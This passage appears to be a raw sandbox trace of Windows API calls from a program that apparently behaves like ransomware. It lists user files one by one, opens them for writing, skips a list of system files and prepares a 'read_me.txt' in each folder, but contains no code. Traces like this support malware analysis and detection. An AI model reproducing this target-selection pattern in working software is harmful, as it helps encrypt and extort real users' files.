(in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0075.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.741] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0075.741] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0075.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.741] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0075.741] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0075.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.742] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0075.742] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0075.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.742] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0075.742] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0075.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x768 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="read_me.txt") returned 0x0 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="autoexec.bat") returned 0x0 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="desktop.ini") returned 0x0 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="autorun.inf") returned 0x0 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat") returned 0x0 [0075.742] StrStrW (lpFirst="ntuser.ini", lpSrch="iconcache.db") returned 0x0 [0075.743] StrStrW (lpFirst="ntuser.ini", lpSrch="bootsect.bak") returned 0x0 [0075.743] StrStrW (lpFirst="ntuser.ini", lpSrch="boot.ini") returned 0x0 [0075.743] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat.log") returned 0x0 [0075.743] StrStrW (lpFirst="ntuser.ini", lpSrch="thumbs.db") returned 0x0 [0075.743] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 5 [0075.743] QueueUserWorkItem (Function=0x404e00, Context=0x768, Flags=0x0) returned 1 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 42 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 43 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 40 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 45 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 42 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 40 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 44 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 43 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0075.743] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 40 [0075.743] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0075.743] FindClose (in: hFindFile=0x7cfea68 | out: hFindFile=0x7cfea68) returned 1 [0075.744] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\read_me.txt") returned 45 [0075.744] GetProcessHeap () returned 0x4f10000 [0075.744] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0075.744] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 35 [0075.744] GetProcessHeap () returned 0x4f10000 [0075.744] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.922] GetProcessHeap () returned 0x4f10000 [0075.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dd10f8 [0075.922] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0075.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0075.923] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt") returned 53 [0075.923] GetProcessHeap () returned 0x4f10000 [0075.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dd10f8 | out: hHeap=0x4f10000) returned 1 [0075.923] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 37 [0075.923] GetProcessHeap () returned 0x4f10000 [0075.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b10090 | out: hHeap=0x4f10000) returned 1 [0075.932] GetProcessHeap () returned 0x4f10000 [0075.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8de1100 [0075.933] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0075.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.934] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0075.934] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.934] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0075.934] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ca0bd0, ftCreationTime.dwHighDateTime=0x1d4d0f5, ftLastAccessTime.dwLowDateTime=0xb35569f0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0xb35569f0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x11b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0N-rV-LBaIjM3NXE.gif", cAlternateFileName="0N-RV-~1.GIF")) returned 1 [0075.934] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0N-rV-LBaIjM3NXE.gif") returned 62 [0075.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0N-rV-LBaIjM3NXE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0n-rv-lbaijm3nxe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="read_me.txt") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="autoexec.bat") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="desktop.ini") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="autorun.inf") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="ntuser.dat") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="iconcache.db") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="bootsect.bak") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="boot.ini") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="ntuser.dat.log") returned 0x0 [0075.934] StrStrW (lpFirst="0n-rv-lbaijm3nxe.gif", lpSrch="thumbs.db") returned 0x0 [0075.935] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 9 [0075.935] QueueUserWorkItem (Function=0x404e00, Context=0x764, Flags=0x0) returned 1 [0075.935] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd129f40, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0x42ea9cd0, ftLastAccessTime.dwHighDateTime=0x1d4cf42, ftLastWriteTime.dwLowDateTime=0x42ea9cd0, ftLastWriteTime.dwHighDateTime=0x1d4cf42, nFileSizeHigh=0x0, nFileSizeLow=0x18d4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1QQBxYdUEBz.mp3", cAlternateFileName="1QQBXY~1.MP3")) returned 1 [0075.935] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1QQBxYdUEBz.mp3") returned 57 [0075.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1QQBxYdUEBz.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1qqbxyduebz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x76c [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="read_me.txt") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="autoexec.bat") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="desktop.ini") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="autorun.inf") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="ntuser.dat") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="iconcache.db") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="bootsect.bak") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="boot.ini") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0075.935] StrStrW (lpFirst="1qqbxyduebz.mp3", lpSrch="thumbs.db") returned 0x0 [0075.935] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 10 [0075.935] QueueUserWorkItem (Function=0x404e00, Context=0x76c, Flags=0x0) returned 1 [0075.935] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b49ac0, ftCreationTime.dwHighDateTime=0x1d4c9ad, ftLastAccessTime.dwLowDateTime=0x982967b0, ftLastAccessTime.dwHighDateTime=0x1d4cc74, ftLastWriteTime.dwLowDateTime=0x982967b0, ftLastWriteTime.dwHighDateTime=0x1d4cc74, nFileSizeHigh=0x0, nFileSizeLow=0x117ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Y3KdQk.jpg", cAlternateFileName="")) returned 1 [0075.935] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Y3KdQk.jpg") returned 53 [0075.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Y3KdQk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3y3kdqk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x770 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="read_me.txt") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="autoexec.bat") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="desktop.ini") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="autorun.inf") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="ntuser.dat") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="iconcache.db") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="bootsect.bak") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="boot.ini") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0075.936] StrStrW (lpFirst="3y3kdqk.jpg", lpSrch="thumbs.db") returned 0x0 [0075.936] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 11 [0075.936] QueueUserWorkItem (Function=0x404e00, Context=0x770, Flags=0x0) returned 1 [0075.936] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4aQclz9QavwtjC5QkBV", cAlternateFileName="4AQCLZ~1")) returned 1 [0075.936] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV") returned 61 [0075.936] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b0dce50, 